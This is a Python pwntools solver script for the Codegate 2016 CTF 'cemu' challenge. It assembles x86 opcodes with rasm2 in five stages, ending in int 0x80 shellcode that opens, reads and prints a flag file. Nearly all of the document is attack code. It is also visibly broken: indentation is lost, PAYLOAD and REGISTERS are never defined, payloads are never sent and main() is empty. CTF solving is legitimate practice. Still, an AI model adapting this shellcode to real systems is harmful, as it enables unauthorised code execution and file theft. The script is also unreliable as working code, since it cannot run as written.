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Created March 17, 2016 01:01
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Codegate 2016 CTF Quals - cemu (512)
#!/usr/bin/env python
import commands
from pwn import *
HOST = ""
# HOST = ""
PORT = 31337
c = remote(HOST, PORT)
def getIdent(t):
if t == '+' or t == '-':
return '0'
return '1'
def getPayloadExpr(instr, val):
cmd = "rasm2 -a x86 'mov {}, {}'".format(instr, getIdent(val))
return commands.getoutput(cmd)
def stage1():
print c.recvuntil("EAX = ")
REGISTERS["EAX"] = c.recvline().strip()
print c.recvuntil("EBX = ")
REGISTERS["EBX"] = c.recvline().strip()
print c.recvuntil("ECX = ")
REGISTERS["ECX"] = c.recvline().strip()
print c.recvuntil("EDX = ")
REGISTERS["EDX"] = c.recvline().strip()
print c.recvuntil("ESP = ")
REGISTERS["ESP"] = c.recvline().strip()
print c.recvuntil("EBP = ")
REGISTERS["EBP"] = c.recvline().strip()
print c.recvuntil("ESI = ")
REGISTERS["ESI"] = c.recvline().strip()
print c.recvuntil("EDI = ")
REGISTERS["EDI"] = c.recvline().strip()
for k, v in REGISTERS.iteritems():
CMD = "rasm2 -a x86 'mov {}, {}'".format(k, v)
PAYLOAD += commands.getoutput(CMD)
# Input:
print c.recvuntil("Opcode")
# Send Input:
# Result:
print c.recvuntil("EIP = ")
print c.recvline()
print c.recvline()
def stage2():
print c.recvuntil("below")
print c.recvline()
EXPR = c.recvline().strip().split()
print "Expression: {}".format(repr(EXPR))
EAX = "rasm2 -a x86 'mov {}, {}'".format("EAX", EXPR[-1])
PAYLOAD += commands.getoutput(EAX)
# Samples:
# eax - ebp - esp - edx + edi + ebx * esi - ecx = 1992741006
# eax * ebp * esp + edx * edi * ebx * esi - ecx = 4235741836
# eax + ebp * esp + edx * edi - ebx * esi * ecx = 3774945113
# eax + ebp * esp + edx - edi * ebx * esi + ecx = 3226531046
# Transform:
# eax + ebp * esp + edx - edi * ebx * esi + ecx = 3226531046
# 3226531046 + 0 * 1 + 0 - 0 * 1 * 1 + 0 = 3226531046
PAYLOAD += getPayloadExpr(EXPR[2], EXPR[2 - 1])
PAYLOAD += getPayloadExpr(EXPR[4], EXPR[4 - 1])
PAYLOAD += getPayloadExpr(EXPR[8], EXPR[8 - 1])
PAYLOAD += getPayloadExpr(EXPR[10], EXPR[10 - 1])
PAYLOAD += getPayloadExpr(EXPR[12], EXPR[12 - 1])
PAYLOAD += getPayloadExpr(EXPR[14], EXPR[14 - 1])
print c.recvuntil("EIP = ")
print c.recvline()
print c.recvline()
def stage3():
print c.recvuntil("Opcode")
# rasm2 "mov edi, 0x1010; mov ecx, 0xffffffff" | xargs echo -n && echo -n f3ae && rasm2 "mov eax, edi"
readMem = "bf10100000b9fffffffff3ae89f8"
# Reads 32 bytes from memory
print "Sending ReadMem: {}".format(readMem)
print c.recvuntil("EIP =")
print c.recvline()
print c.recvline()
print c.recvline()
def stage4():
print c.recvuntil("yeah!")
print c.recvline()
eip_target = c.recvline()
print eip_target
eip_target = eip_target.split(" ")[-1].strip()
print eip_target
print "Current EIP Target: {}".format(eip_target)
print c.recvuntil("code")
# [ A: store target in eaxx ] [ B: set target to jump to self (eax) ] [ C: jmp to target ]
cmd = "mov eax, {}; mov dword ptr[eax], 0xe0ff; jmp eax".format(eip_target)
result = commands.getoutput("rasm2 '{}'".format(cmd))
print result
print c.recvuntil("EIP = ")
def stage5():
# ./flag = push 0x67616c66
openFile = """
xor eax, eax;
push eax;
push 0x67616c66;
xor eax, eax;
mov al, 5;
mov ebx, esp;
xor ecx, ecx;
int 0x80;"""
readFile = """
mov ebx, eax;
xor eax, eax;
mov al, 3;
mov ecx, esp;
xor edx, edx;
mov dl, 64;
int 0x80;"""
writeOutput = """
mov edx, eax;
xor eax, eax;
xor ebx, ebx;
mov al, 4;
mov bl, 1;
mov ecx, esp;
int 0x80;"""
openFileExec = commands.getoutput("rasm2 '{}'".format(openFile))
readFileExec = commands.getoutput("rasm2 '{}'".format(readFile))
writeOutputExec = commands.getoutput("rasm2 '{}'".format(writeOutput))
opcodes = openFileExec + readFileExec + writeOutputExec
print c.recvuntil("code")
print c.recvuntil("Stage5 Clear!")
def main():
if __name__ == "__main__":
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